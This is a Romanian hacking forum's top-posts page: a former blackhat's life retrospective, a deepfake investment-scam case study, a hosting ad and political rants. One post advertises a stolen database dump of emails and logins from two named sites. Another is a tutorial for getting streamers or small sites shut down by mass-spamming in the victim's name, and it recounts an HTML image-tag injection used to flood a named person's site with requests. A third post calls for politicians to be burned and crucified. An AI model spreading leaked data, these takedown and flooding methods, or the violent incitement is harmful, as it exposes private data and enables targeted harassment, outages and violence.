Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation since 03/12/24 in all areas

  1. Au trecut 15 ani de la postarea "Sfaturi de om batran pentru ai nostri hackeri tineri". Acum am 42 de ani, am trecut prin multe experiente mai mult sau mai putin placute, asa ca viziunea mea personala despre viata este, cumva, putin mai diferita. Sa facem un rezumat la ce am spus in urma cu 15 ani. In continuare sunt de aceasi parere. A fi "hacker" este un mindset. In opinia mea a fi "hacker" (blackhat), inseamna in primul rand a sta ascuns. Daca nu te ascunzi cum trebuie nu mai esti hacker, esti puscarias. Doza de dopamina de care ai parte atunci cand primesti laude pentru ce ai facut este o recompensa personala de scurta durata. Nu considera ca ai facut mare lucru. Intotdeauna vor fi alte persoane care vor face acelasi lucru mult mai bine si intr-un mod mult mai interesant decat ai facut-o tu. Nu ti-o lua in cap si nu dezvolta un complex de zeu. Eu am trecut prin asta. E neplacut si te transforma intr-o persoana greu de suportat. Hackingul e pielea pulii, mai ales cand iti chiorăie mațele de foame. Acum citesc si eu, dupa 15 ani de la prima postare, ce opinie aveam despre relationarea cu oamenii. Nu numai ca nu mi-am schimbat parerea, dar chiar am ajuns sa ii indrum si pe altii sa procedeze la fel. A fi o persoana de treaba inseamna pe termen lung a creea conexiuni si relatii de calitate. Pe langa treburile mele am un job stabil, bine platit, pe care l-am obtinut folosind acest principiu. O fosta "victima" a mea este acum angajatorul meu. Lucrez de peste 7 ani in compania detinuta de aceasta persoana, iar datorita faptului ca am fost mereu corect, muncitor si respectuos, aceasta persoana a fost mereu alaturi de mine in cele mai grele momente ale vietii mele si m-a ajutat extraordinar de mult atunci cand aveam nevoie de ajutor. Nu strica sa fii o persoana corecta si de treaba, pentru ca, in general, oamenii cu care interactionam sunt oameni buni. Nu mai fac parte din comunitatea de hacking de foarte multi ani, nu ma mai invart in aceleasi cercuri de oameni in care ma invarteam inainte, asa ca opinia mea actuala se bazeaza pe experientele mele din ultimii 10 ani. Cumva este greu sa prezint aceasta parte, pentru ca am ajuns la un nivel de maturitate si de skilluri in comunicare care rezolva de la sine toate aceste probleme. Ce am invatat: - transmiteti-i direct omului care este perceptia voastra despre ce s-a intamplat - aflati daca persoana respectiva a gresit intentionat, sau pur si simplu a fost o neintelegere - daca a fost o neintelegere aratati-va bunavointa si incercati sa dregeti situatia, chiar daca nu ati fost voi de vina. Neintelegerile sunt insotite de regrete. Daca persoana respectiva regreta cu adevarat ca a gresit, faceti tot posibilul sa ii aratati ca intelegeti prin ce trece si ca nu ii purtati pica. Chiar daca aceasta atitudine nu vă va aduce intotdeauna mari beneficii, va veti simti foarte bine in pielea voastra, si veti dezvolta o relatie OK cu acea persoana. - daca NU a fost o neintelegere puteti urma sfaturile mele anterioare. Regulile raman aceleasi. Nu tineti cont de varsta si de sex, nu trebuie sa aveti mustrari de constiinta, nu trebuie sa va fie frica si NU UITATI. Din pacate asta este viata si uneori este nevoie sa aratam de ce suntem in stare pentru a fi lasati in pace. Nu este nevoie sa mai repet. Odata ce o persoana capata statutul de "inamic" trebuie tratata ca atare. Acum nu mai vorbesc din pozitia de "hacker", ci vorbesc din pozitia de om. Doar sa aveti grija sa nu categorisiti o persoana care a facut o simpla greseala ca fiind "inamic". Nimic nou sub soare. Opinia mea este aceeasi. Voi sari peste anumite puncte pentru ca nu ma mai reprezinta. Nu mai sunt parte din comunitatea RST, deci nu se mai aplica unele situatii. Parerea mea este aceeasi. Hai sa o simplificam si sa dam un exemplu din viata de zi cu zi. Mergi pe strada. La un moment dat dai peste unul plin de muschi, agresiv, pus pe harta, care o cauta cu tine. Daca ai 60 de kg imbracat si zero experienta in lupta, trebuie sa fii cam retard sa ai impresia ca intr-o confruntare 1 la 1 ai avea sanse sa castigi lupta. La fel a fost, este, si va fi, pe internet. Trebuie sa stii care iti sunt limitele. Daca exista o sansa reala de a fi dominat de cineva pe internet sau in viata reala, evita acel confict. E ok. Nu este o rusine sa respecti niste limite pentru a te proteja. Viata e lunga, de ce sa ti-o complici cand poti evita complicatiile? Nu am stapanit niciodata si nici nu cred ca voi stapani vreodata un limbaj de programare. Dar cand a fost nevoie am stiut sa fac singur cateva scripturi sau sa rog / platesc pe cineva sa ma ajute sa fac niste scripturi / programe. In ziua de azi nu cred ca mai conteaza daca esti "hacker" sau nu. Toata lumea este orientata catre castiguri financiare, nu catre a castiga respect in anumite comunitati de baieti priceputi de pe internet. Nu este neaparat un lucru rau, pentru ca vremurile s-au schimbat, prioritatile s-au schimbat, oamenii s-au schimbat. Daca nu stii un limbaj de programare nu este o problema atata timp cat nu iti doresti sa detii, pe bune, statutul de "hacker". Daca esti orientat catre castiguri financiare invata sa ceri programatorului ce ai nevoie, invata sa faci un flow, invata sa comunici cat mai bine ce ai nevoie si mai ales, invata sa vanezi bug-uri pentru a iti perfectiona aplicatia, fie ca este un soft care ruleaza pe propriul pc/telefon, fie ca este o aplicatie web. -------------------- Acum na, nu stiu cine ma mai cunoaste pe aici, cui ii mai pasa de existenta mea si de viata mea. Dar pentru cei care ma cunosc si au cea mai mica curiozitate ce am mai facut de cand am disparut, o sa fac un rezumat al ultimilor 8 ani din viata mea. Nu pentru a imi alimenta egoul, ci pentru a lasa scris experientele prin care am trecut, pentru ca am trecut prin momente de cosmar pe care am reusit sa le depasesc cu brio. Am trecut prin probleme de sanatate mai mari de cat mi-as fi imaginat vreodata. Fibromyalgia mi-a rapit 3 ani din viata si m-a facut din om neom. Din cauza asta am trecut prin axietate si depresie in adevaratul sens al cuvantului. Datorita unui coleg de munca am aflat despre metoda Wim Hof si am reusit sa inving anxietatea, depresia si fibromyalgia, despre care se spune ca este imposibil de vindecat. Inca ii mai simt prezenta uneori, dar reusesc foarte rapid sa o elimin din minte si din organism. Am trecut prin viciul cocainei si al alcoolului. Cine ma cunoaste mai bine stie ca aveam de ani de zile o adictie pentru iarba. La iarba am renuntat la inceputul pandemiei si o consider istorie. A fost cel mai jegos si pervers drog. Mi-am futut rau de tot receptorii canabinoizi si de aici pana la fibromyalgie a fost doar un mic pas. Cand aud prajiti care lauda iarba si efectele ei incerc sa le deschid ochii, chiar daca sansele de a ii convinge sunt minime. Este greu sa te pui cu prostia din mintea oamenilor, mai ales cand acestia fac cherry picking care sa le valideze pozitiv consumul de iarba. Si eu am fost prost asa ca incerc sa nu ii judec pe altii. Dar intre noi fie vorba, fumatorii cronici de iarba sufera de un retard pe care este foarte greu sa il combati. Toti fumatorii cronici, absolut toti, au aceeasi retorica retarda. Iarba e buna, iarba vindeca cancerul, iarba nu da dependenta, iarba nu este gateway drug. Gresit! Iarba FUMATA cauzeaza cancer pulmonar, probleme cardiace, este gateway drug si duce inevitabil la anxietate si depresie. Prajitii sunt prosti rau de tot si nu au nici o directie coerenta in viata. Nici macar consumul de heroina nu mi-a futut sanatatea si creierul asa cum mi le-a futut iarba. Sfat: daca esti prost macar nu mai semnaliza si nu mai face reclama unui drog care fute vieti mai rau decat heroina. Heroina iti da macar un scop, acela de a face rost de urmatoarea doza. Iarba te face apatic, visator, anxios si pierde vara. Adica un ratat care nu realizeaza cat de ratat este. Cele mai proaste decizii luate in viata au fost luate in perioada cand fumam. Am pierdut ani de zile visand la ce voi face maine, fara a face cu adevarat ceva in sensul asta, pentru ca iarba asa cum te face sa visezi si sa iti faci planuri, tot la fel te face sa te si indoiesti de planurile facute. De cocaina nu m-am mai atins de aproape un an. Nu am pofta de ea, sau vreun gand sa ma mai apuc din nou sa o consum. Am fost in preajma ei de cateva ori in ultima perioada si nu mi-a trezit nici o emotie. Muie cox. Iarba a fost mult mai nasoala, dar si mizeria de cox strica sinusuri, neuroni, relatii si prietenii. Cu alcoolul inca mai este o vaga problema, dar am ajuns sa reduc portia de tarie de la minim 300ml pe zi, la 300ml o zi pe saptamana. Consider ca este o problema pentru ca vreau sa reduc consumul la 0. Am inceput sa meditez in 2019 si am continuat sa o fac pana in ziua de azi. Cea mai buna alegere. Am urmat cursurile lui Paul Olteanu (RECOMAND), am inceput sa citesc carti de dezvoltare personala, neurostiinta, sa urmez cursuri de bussiness si am studiat tehnici de terapie. In momentul de fata pe langa job-ul pe care il am in IT si ce mai fac eu pe langa (tot in domeniul IT), am inceput sa lucrez cu cupluri care au probleme in relatie si cu persoane care se confrunta cu atacuri de panica, PTSD si anxietate profunda. Sper ca in curand sa fac un switch major de cariera si sa ma ocup exclusiv cu terapia de cuplu, terapia persoanelor cu atacuri de panica, celor cu anxietate si a celor cu PTSD. Se pare ca skillul de a manipula oameni poate fi folosit si in scopuri bune, nu doar in scopuri rele. In caz ca va intrebati daca ma mai ocup de hacking: oarecum. La job ma folosesc de experienta pe care o am pentru a descoperi directii noi. Nu mai comit ilegalitati, dar experienta dobandita de-a lungul anilor a fost cea care mi-a asigurat un post cald intr-o companie superba pentru care lucrez de mai mult de 7 ani. Se pare ca oamenii care gandesc "outside of box" sunt o raritate vanata de recrutori. Asa ca pot spune, fara teama de a gresi cu ceva, ca toti anii in care m-am ocupat doar de hacking au meritat. Din toate punctele de vedere. Sunt bine. Cred ca mai bine decat oricand. Mintea la 40+ ani functioneaza altfel. Caut liniste si pace, imi vad de familie, job si planuri, iar asta mi-a usurat viata destul de mult. Nu va speriati de varsta asta. Este o perioada foarte frumoasa daca aveti langa voi persoane dragi si stabilitate emotionala. Cam atat momentan. Ne mai auzim peste 15 ani, daca mai exista forumul P.S.: @Nytro te pupa fratele tau si scuze ca am disparut ca magarul in ceata cu proiectul ala din pandemie. Au aparut niste probleme nasoale in viata mea la momentul respectiv. Sper sa ma revansez candva.
    14 points
  2. Hello komrads today's hacked romanian websites zoso.ro & arhiblog.ro FULL DB Dump from today. All emails from comments and all logins. Download here: You need to be a registered user to view this link! You need to comment "Thank You" after you log in!
    14 points
  3. Traim, doar ca am imbatranit si muncim. Iar in timpul liber mai facem alte lucruri, gen vizitam alte tari, altii cu copii, ne dam pe motoare, bem... Intram pe aici dar avem sperante ca tinerii din ziua de azi vor deveni mai "sociabili" online si vor dori sa se ajute reciproc. A cam disparut mentalitatea de "give something back to the community".
    11 points
  4. Cum e fratilor? Unde e democratia? 5 oameni s-au pisat pe milioane de romani. Din pix. Lovitura de stat fara armata, fara nimic. Indiferent cu cine ati votat sau ce favorit ati avut. Democratia s-a dovedit o carpa de sters la cur, asa cum spuneam "Ministrul Justiției: Românii trebuie să voteze în cunoștință de cauză, să afle adevărul despre ce s-a întâmplat" Romanii ar trebui sa-i alerge si sa-i incendieze, baga-si-ar pula in ea de capusala. Sa dea socoteala pentru toti anii de hotie, pentru coruptie, nepotism si 7 generatii din familiile politicienilor ce ar fi trebuit sa-si serveasca tara sa fie batuti in cuie, rastigniti si incendiati.
    10 points
  5. Nu ai ce gestiona. E un bullshit treaba cu atacurile, iar raportul este facut pentru a putea invalida alegerile, in caz ca nu le convine ceva. Nu Simion, Georgescu sau care mai sunt au distrus tara. Consumam ce ne este servit, de +30 de ani. Rahatul cu convocarea CSAT este la ordinul evreului refuzat la export (Iohannis). Nu am votat si nu voi vota niciodata pentru ceva legat de Romania. Sunt plecat de multi ani din tara si nu consider ca ar fi corect sa influentez directia in care merge, prin vot. Ma consider de partea dreptei extreme si cred ca democratia este gresit inteleasa de multi. Multe legi ar trebui schimbate sau pur si simplu eliminate Daca ai un angajat care te fura, nu astepti patru ani. Il dai afara pe loc. Acelasi lucru ar trebui sa se aplice si functionarilor publici. Ei sunt acolo sa ne reprezinte interesele, nu sa faca ce vor. Sa zicem ca esti primar. Dupa cinci-sase luni, daca nu ai realizat nimic, venim peste tine, te luam la rost si iti dam un ultimatum: doua luni sa ne arati rezultate. Calea catre adevar incepe cu fermitatea – ranga intr-o mana si Biblia in cealalta. Pentru cei care striga "vrem democratie" – ce fel de democratie doriti? Cea "moderna", in care alegerile sunt libere doar pe hartie, dar de fapt manipulate prin propaganda si populism? Sau poate cea in care institutiile, platite din bani publici, se autointituleaza democratice, dar sunt ineficiente si corupte? Ori preferati varianta in care drepturile sunt garantate, dar raman inaccesibile pentru pulime?
    10 points
  6. Studiu de caz: Operatiunea “DeepFake” Context In data de 7 august au fost retinuti in Chisinau 12 persoane intr-o ancheta desfasurata de autoritatile romane in colaborare cu cele din Republica Moldova. Cei 12 suspecti au fost arestati deoarece se considera ca ar fi inselat sute de romani si au obtinut un total estimat de 15 milioane de lei. Operațiunea a fost coordonată cu implicarea structurilor de drept din ambele țări, evidențiind colaborarea transfrontalieră în combaterea criminalității organizate și a noilor tipuri de infracțiuni care implică tehnologii avansate. Gruparea infractionala folosea tehnologia deepfake pentru a genera clipuri trucate cu personalitati mari din Romania in care acestia incurajau populatia sa investeasca in diferite escrocherii online. Despre gruparea “DeepFake” Conform cercetarilor mele, gruparea activeaza inca de la sfarsitul lui decembrie anul trecut(2023). Nu exista o data exacta insa pot estima undeva de la opt luni pana la un an de la momentul scrierii acestui studiu de caz. Gruparea are sedii fizice atat in Moldova cat si in Romania, de unde acestia apeleaza clientii. Conform moldova1.md “Persoanele reținute, cu vârste între 20 și 45 de ani, erau angajate de companii care implementau selecții riguroase, inclusiv teste de poligraf. Majoritatea bănuiților sunt tineri angajați în centre de apel, specialiști IT și agenți de vânzări, în timp ce alții aveau roluri de superiori sau administratori. Unele persoane și-au recunoscut vinovăția și cooperează cu autoritățile.” Din cateva apeluri purtate cu operatorii acestei grupari am inteles ca programul de lucru al angajatilor este de luni pana vineri. Majoritatea dintre acestia sunt oameni cu varste cuprinse intre 25-30 ani dar sunt si studenti cu o situatie financiara precara care nu stiu cu adevarat ce vand oamenilor. Cel mai probabil, acestia sunt recrutati de pe grupuri de Facebook si de pe platforme precum OLX. Cum functioneaza toata operatiunea Scam-ul incepe dindata ce utilizatorul de rand foloseste retele sociale precum: YouTube, Facebook, Instagram. Gruparea genereaza reclame de pe mai multe pagini de Facebook, Instagram chiar si YouTube. Din cercetarile mele, grupul foloseste persoane cunoscute din Romania pentru a ajunge mai usor la public, printre care regasim: Andreea Esca, Mugur Isarescu, Florin Zamfirescu, Ion Tiriac, Iancu Guda ruleaza mai multe scenarii, dar in acest document o sa investigam modul de operare a scenariului BRUA. Personal, am dat de reclama pe YouTube, unde Denise Rifai, prezentatoarea emisiunii “40 de intrebari” vorbea cu Florin Zamfirescu unde acesta afirma ca reuseste sa faca zeci de mii de lei prin intermediul investitiilor in BRUA. BRUA există, dar nu ca fond de investiții ci este magistrala de GAZ dintre Bulgaria-România-Ungaria-Austria și găsim informații pe site-urile oficiale ale statului. Utilizatorul care acceseaza pagina din reclama este redirectionat pe un domeniu unde site-ul rfi.fr/ro este clonat 1:1. Pe site este prezentat un articol unde se prezinta o conversatie intre Denise Rifai si invitatul Florin Zamfirescu. De exemplu, doua dintre domeniile folosite sunt dixycaa.com si fuwakumarofe.life La sfarsitul articolului se regaseste un link de redirect pentru a completa un formular cu: nume, mail si numar de telefon. Odata completat, un operator urmeaza sa se sune victima. Conversatia urmeaza intotdeauna acelasi curs, daca cumva clientul deraiaza cu o intrebare care nu este anticipata, operatorul ramane blocat, deseori oprind microfonul(probabil pentru a intreba colegii din incapere ce sa raspunda). Tonul este unul prietenos, operatorul este instruit sa se adapteze oricarui tip de comportament social. De asemenea, acesta este foarte sociabil, aproape ca un prieten(dar care vrea sa-ti fure banii). Dupa ce victima este convinsa si se stabileste o relatie de incredere minima, operatorul trimite pe WhatsApp un link catre un site web fals, care arata identic cu site-ul legitim din care iti poti retrage “câștigurile”. Dar, nu inainte sa efectuezi un transfer prin IBAN de minim 1250 RON pentru a-ti incepe ‘’investitia’’. Convorbirea se deruleaza astfel: Prezentarea operatorului si a firmei Intrebari precum: varsta, locul de munca, surse de venit, cetatenie, banca, buget Explicarea procesului Trimiterea unui mesaj pe WhatsApp cu link catre o platforma clonata la fel, 1:1 Generarea unui cont pe platforma respectiva si trimiterea acestuia prin WhatsApp Castigarea increderii Si desigur, plata prin card catre contul trimis prin WhatsApp Desi operatorii sunt instruiti sa fie prietenosi si sociabili, am observat ca se enerveaza foarte tare cand nu esti in stare sa scrii codul IBAN corect pentru a face plata, chiar nu inteleg de ce. Manipularea psihologica Tot procesul este unul amplu si bine gandit, textul de pe site-ul web fiind unul bine gandit cu scopul de a manipula oamenii. Putem observa in imaginea de mai jos cum se creeaza scenariul perfect pentru un atac de tip phishing. Gruparea incearca sa distraga omul prin creearea senzatiei de a rata oportunitatea vietii. De asemenea, in sectiunea falsa de comentarii, putem observa recenziile. Aceasta tehnica este folosita frecvent in campaniile de inselatorie, unde victimele sunt atrase prin recenzii false si promisiuni de castiguri rapide. Odata ce utilizatorii sunt convinsi de veridicitatea comentariilor, acestia devin tiinte sigure. Efectul de validare sociala joaca un rol crucial in acest proces. Comentariile pozitive creeaza o iluzie de incredere ceea ce ii face pe utilizatori mai predispusi sa pice in plasa escrocilor. Cum manipuleaza oamenii Odata furnizate datele pe domeniile fantoma, oamenii sunt sunati de catre un operator. Operatorii, conform recorder.ro aveau script-uri gata pregatite pentru a raspunde victimelor cu raspunsuri predefinite. Putem observa clar cum operatorii au raspunsurile pregatite pentru cele mai comune intrebari si raspunsuri date de clienti. Asta denota ca gruparea este una profesionista si bine pregatita, nu doar un simplu grup de oameni fara cunostinte. Dupa captarea atenției și câștigarea încrederii, acesta urmeaza sa introducă date precum: numele, email-ul si numarul de telefon. Astfel, la scurt timp dupa (maximum 24 ore, potrivit site-ului), o persoana implicata in gruparea infracțională te va suna sa te convinga de legitimitatea investiției si garantarea unui profit intr-un timp foarte scurt. Anonimizarea operatiunii Fiind o grupare infractionala bine organizata, acestia si-au luat masurile necesare pentru a-si asigura procesul de anonimizare minim. Regasim urmatoarele tehnici folosite. Anonimizarea datelor din registrele domeniilor ICANN care este o organizație non-profit responsabila pentru coordonarea și mentinerea stabilitatii si securitatii sistemului global de adrese IP si nume de domenii pe internet care este supusa in mod direct legii GDPR care protejeaza datele personale. Domeniile folosite de atacatori sunt cumparate de la namecheap, un comerciant care dupa implementarea GDPR in 2018 a creat serviciul withheldforprivacy, un serviciu menit sa mascheze datele reale ale detinatinatorului unui domeniu cu date generice. Asadar, informatii precum: nume, numar de telefon, adresa, mail sunt toate inlocuite cu unele generice. Numere spoofed Gruparea foloseste numere spoofed, adica atunci cand esti apelat de catre operator, numarul original este afisat ca fiind altul. Nu mare mi-a fost mirarea cand sunam inapoi la numarul operatorului, imi raspundeau persoane care nu aveau nici-o legatura cu operatiunea aceasta. Reclame non-stop Deoarece acestia stiau ca platformele mentionate vor depista rapid reclamele inselatoare, acestia generau sute de conturi si domenii dupa care promovau videoclipurile care utilizau deepfake incontinuu avand ca target de audienta persoane din Romania cu varste cuprinse intre 30-60 ani. Ce urmeaza? In urma convorbirilor si a pretextului ca vreau sa investesc, am reusit sa obtin de la un operator IBAN-ul contului in care urma sa virez suma(spoiler alert: n-am facut-o) Deoarece consider ca IBAN-ul este defapt a unei persoane pacalite la randul ei, nu am sa divulg IBAN-ul in mediul public. Parerea mea este ca grupul infractional nu a fost constituit doar din cele 12 persoane prinse si ca aceasta urmeaza sa isi desfasoarea activitatea in continuare. Am sa urmaresc in continuare acest caz iar daca alte date relevante apar am sa continui cu acest studiu.
    7 points
  7. O zi productiva pentru forum, una cu multe conturi noi inregistrate
    7 points
  8. Hackerii pot sa-ți fută si mama, mai bine decât o face tatăl tău. Învățați in pula mea ce înseamna hacker si nu folosiți internetul pentru a face laba la strâmbele prezentate pe cancan.
    7 points
  9. Sunt mândru să vă prezint ultimul nostru produs, realizat după cele mai înalte standarde ale găzduirii web în 2024, cu resurse alocate din belșug fiecărui plan de găzduire, administrate cu ușurință de către cPanel și livrate de către cel mai performant server web din lume, LiteSpeed, totul construit pe infrastructură dedicată enterprise, în România. RoLeaf.ro este o platformă completă de găzduire și administrare a oricărui site web ce se remarcă prin ușurința de folosire, minimalism în termeni și focusul pe elementele diferențiatoare. Cu prețuri fixe în moneda națională și 2 luni gratuite la plata anuală, reușim să oferim unele dintre cele mai mici prețuri de pe piața românească raportate la resursele oferite. Totodată, fiind registrar acreditat RoTLD, putem să vă oferim domenii .ro la un preț fix de doar 40 de lei/an. În plus, orice plan de găzduire poate să opteze pentru o adresă IP dedicată la un cost suplimentar de doar 5 lei/lună. Pe lângă toate acestea, avem și un program de afiliere deschis tuturor, în care puteți câștiga comisioane în valoare de 10% recurring pe viață pentru fiecare achiziție realizată prin intermediul link-ului vostru (inclusiv domenii) sub formă de credit în platformă. Mai multe vă las să descoperiți singuri pe site, și, ca de obicei, mulțumesc administratorilor pentru platformă!
    7 points
  10. As vrea sa fac cumva sa prezint totul intr-o lumina super tehnica, dar adevarul este ca felul in care functioneaza internetul ne permite sa futem cu usurinta afacerile unor persoane care isi castiga veniturile din online. Metoda se aplica cu usurinta atat la streameri, cat si la conturi de pe retele sociale, YouTube, sau siteuri. Este blackhat, este muism, functioneaza de foarte multi ani si va mai functiona in continuare zeci de ani de acum inainte. Metoda este cunoscuta de o parte din vechiul staff RST si daca nu era mort forumul si eu nu as fi fost beat nu as fi postat asa ceva. Vedem daca si in zilele urmatoare o sa mai las tutorialul sau o sa cer stergerea lui. E-mail Spam. Aceasta este prima si cea mai usoara metoda. Testata in urma cu mult timp, testata relativ recent. Rata de succes aproape de 100% cu repercursiuni pe termen lung. Hai sa vedem despre ce este vorba. Sa spunem ca vrei sa inchizi un cont de streamer, un canal de YouTube, un cont de Facebook sau un site care nu are tld .ro. Pare cumva imposibil, mai ales in cazul conturilor de streameri sau de YouTube. Insa nivelul de dificultate este aproape mediu. Mediu inspre usor, pentru ca implica resurse minime pentrru cei priceputi si oleaca de creier. Ca sa fie clar pentru toata lumea, aceasta metoda a fost pentru prima data testata de mine in 2013 si se pare ca este valida si in ziua de azi. Specific ca a fost testata de mine in 2013 pentru ca este atat de simpla incat sigur mai exista cateva sute sau mii de persoane care o abuzeaza de ani de zile. Ce implica? Hai sa vedem. Luam ca exemplu un cont de streamer. Sa spunem ca il cheama Filviu Saiăr. Stim ca aceasta persoana monetizeaza atat pe Twitch cat si pe YouTube. Cele doua platforme au reguli bine definite in privinta spamului. Si daca nu ar avea, atata timp cat sunt "legit" (scuze pentru romgleza - muie @mannnu), tot se supun legislatiei in vigoare. Iar legislatia in vigoare din majoritatea tarilor spune ca nu ai voie sa spamezi in inboxurile oamenilor, pentru ca... sloboz la tava. Nu ai voie. Asa ca ce poate face un tampit care prinde boala pe un streamer? Sa trimita spam la cat mai multe adrese de mail cu mesajul: "Hei, eu sunt Filviu Saiăr. In fiecare saptamana intru pe Twitch si fac stream live pentru publicul meu. Am deja 1.000.000 de urmaritori. Intra si tu pe vvv.twitch.rst/filviusaiăr. Garantat o sa iti placa sa ma urmaresti. Si sa stii ca am si un canal de YouTube care poate fi gasit la adresa vvv.youtube.rst/filviusaiăr. Te astept si pe tine". Exemplul de mesaj este ipotetic, dar ati inteles ideea. Trebuie sa para ca acea persoana incearca sa se promoveze prin orice mijloace, inclusiv prin e-mail spam. Mailul trebuie sa para a fi legit, venit din partea acelei persoane, cu scopul de a o promova. Iar aici facem un salt la metoda "cum sa inchizi un website", dupa care revenim la ceea ce se intampla de fapt si de ce sansele ca aceste persoane sa fie afectate din cauza unui e-mail spam facut in numele lor sunt foarte foarte mari. Promit ca este simplu si promit ca este oarecum amuzant cand veti intelege cat de varza functioneaza legislatia nescrisa a internetului. O sa scriu succint cateva reguli care se aplica pentru ca aceasta metoda sa aiba succes: 1. nu trebuie sa fie un tld .ro 2. nu trebuie sa fie un tld vandut de ROTLD Clarificare: pe romani ii doare la banana de spamul in mail. Daca vei cumpara un domeniu .ro sau orice alt domeniu vandut de ROTLD (este irelevant daca este vandut de ROMARG sau alti selleri), este nevoie sa ti se deschida dosar penal pentru ca domeniul sa fie inchis, sau confiscat de autoritatile romane. Pentru a se intampla asta trebuie sa faci frauda cu acel domeniu, sau sa vinzi produse contrafacute. Cel putin asa era pana acum 4-5 ani. Nu cred ca s-a schimbat ceva intre timp (muie @mannnu - sa iti iau toata familia in pula). Deci, daca vorbim despre un domeniu .com, .net, .org etc atata timp cat trimitem spam exista sanse mari ca acel domeniu sa fie inchis. Care este logica? Logica din urma cu cativa ani era ca Spamhaus se ocupa de spamul in e-mail (colaborau cel putin cu Yahoo Mail), si cand acestia trimiteau notificare catre registrar si providerul de hosting, ori unul, ori altul luau masuri (atata timp cat nu era bulletproof hosting). In ziua de azi nu stiu daca Spamhaus mai au o influenta atat de mare, insa stiu ca in continuare cine este prins ca trimite e-mail spam poate avea probleme. Iar aici intervine, cred eu, problema cu honeypots. O sa va prezint varianta simplificata a intregului flow folosit de companiile care se ocupa cu combaterea spamului si cums e creeaza honeypots. 1. Se creeaza adrese de mail pe toate platformele de e-mail gratuit 2. E-mailurile respective sunt verificate si analizate zilnic de robotii companiilor cu servicii anti-spam 3. Mailurile care sunt dovedite a fi spam intra intr-un flow de: raportare la hosting, raportare la registrarul de domenii, introducere in blacklist. Sau se adauga pe unele siteuri adrese de mail ale companiilor care ofera servici anti-spam si cand le crawleaza cineva si le spameaza adresele de mail incep sa se ia masuri. Nu cred ca metoda asta mai este de actualitate. Nu este obligatoriu ca toate companiile cu servicii anti-spam sa procedeze fix cum am descris mai sus, dar in general cam astia sunt pasii. Punem accent pe raportare la registrarul de domenii si introducere in blacklist. In ziua de azi nu cred ca se duc direct la hosting. @aelius care ofera servicii de hosting ar putea sa ma corecteze unde gresesc pentru ca este mai familiarizat decat mine cu tot flowul asta. Acum revenim la intreaga imagine de ansamblu. Nici o platforma de streaming, de video hosting, de website hosting, nu isi doreste ca ip-urile sa fie listate ca fiind "spammy". Asa ca ori de cate ori cineva abuzeaza de "e-mail marketing" si exista reclamatii incep sa ia masuri. Dar pentru a se lua masuri coercitive trebuie ca mailurile de tip "spam" sa ajunga la un inbox de tip honeypot, pentru ca mai departe sa se ocupe de raportare compania care se ocupa de blacklistul antispam. Masurile coercitive ale registrarului consta in suspendarea domeniului, iar in cazul providerilor de hosting se ajunge la suspendarea serviciilor de hosting. Pe vremuri ne foloseam de Spamhaus ca sa ajungem la aceste rezultate pentru ca erau foarte influenti. Acum nu stiu ce putere mai are Spamhaus, dar stiu ca in cazul reclamatiilor de spam atat hostingul cat si registrarul (daca sunt servicii serioase), cat si platformele de streaming/video hosting, iau masuri cand primesc reclamatii pentru e-mail spam. In cazul providerilor de hosting exista doua metode pentru a le influenta deciziile: - spam in e-mail - DOS/DDOS pe domeniul hostat de ei Imi amintesc cu zambetul pe buze (futu-ti mortii ma-tii @mannnu), cum in 2013 Slick mi-a facut un programel care imi permitea sa modific pachetele RTMP folosite de Adobe flash. Aveam un chat din UK care folosea pachete RTMP, chat pe care il abuzam folosind taguri html de tipul <img src="https://www.domeniu.com:3306" />. Cand trimiteam in chatul respectiv acea sintaxa html de fiecare data cand cineva scria un mesaj pe chat se faceau exponential requesturi de la cei care foloseau Firefox, pentru ca in plugin-container.exe (proces folosit de Firefox pentru Adobe Flash), nu se incheia sesiunea decat la restartul pc-ului, nu si la inchiderea browserului sau a tabului. Practic daca scria cineva pe chat imediat dupa ce injectam html-ul cu imagine, fiecare utilizator de Firefox prezent pe chat facea un request, apoi la urmatorul mesaj - scris de oricine - pe chat se faceau doua requesturi, apoi la urmatorul mesaj 4 requesturi, la urmatorul 8 requesturi s.a.m.d.. Am descoperit bug-ul din intamplare si nu a fost niciodata facut public. Manca la banda ca la balamuc. A murit odata cu Adobe Flash si acum regret ca nu l-am raportat ca sa fac niste $$$ sa imi cumpar Urus. Unde vreau sa ajung este ca la siteuri cu shared hosting si cu limita de resurse, astfel de requesturi pica baza de date a tuturor siteurilor hostate pe acel server, sau intreg hostingul avea banda de net fututa la maxim, iar la cateva ore de la inceperea atacului compania de hosting suspenda site-ul respectiv si il trimitea pe owner in pizda ma-sii in 90% din cazuri. Florin Grozea de la Hi-Q a simtit asta pe pielea lui cand i-am aplicat metoda asta pe siteul floringrozea punct com. Alte clarificari: nu va asteptati sa inchideti domenii de tip amazon punct com. Functioneaza pe domenii normale, de oameni normali, sau de afaceri micute. In cazul creatorilor de content sau al streamerilor va functiona oricat de mare este numarul lor de urmaritori, dar trebuie sa bombardati honeypot-urile serviciilor anti-spam pe termen mai lung. Si cum este, cred eu, imposibil sa aflati care sunt adresele e-mail de tip honeypot, va trebui sa spamati constant un numar mai mare de mailuri (cam 100.000) ca sa aveti rezultatele dorite. Cine are resurse pentru spam poate face asta cu usurinta, dar in general nu o va face pentru ca nu aduce profit financiar. Un copil care vrea sa inchida contul unui streamer care i-a dat ban, nu are resursele necesare pentru a duce planul la bun sfarsit. Cam atat despre subiectul asta. Sa imi bag pula in mortii ma-tii @mannnu. Uite ca oricat de zmeu te crezi imi sugi pula. Bine ai venit pe internet, luati-as familia in pula.
    6 points
  11. Teaser urmatorul sezon: Laviniu revine in forta pe forum si ne explica cum a zburat cu avionul privat in Bali pentru a cumpara o insula unde sa isi petreaca vacanta anul asta. Ajunge la concluzia ca Urus este pentru saraci; isi cumpara 6 supercars, toate roz. @mannnu afla ca a fost inselat de Laviniu si ca a luat hiv de la el.
    6 points
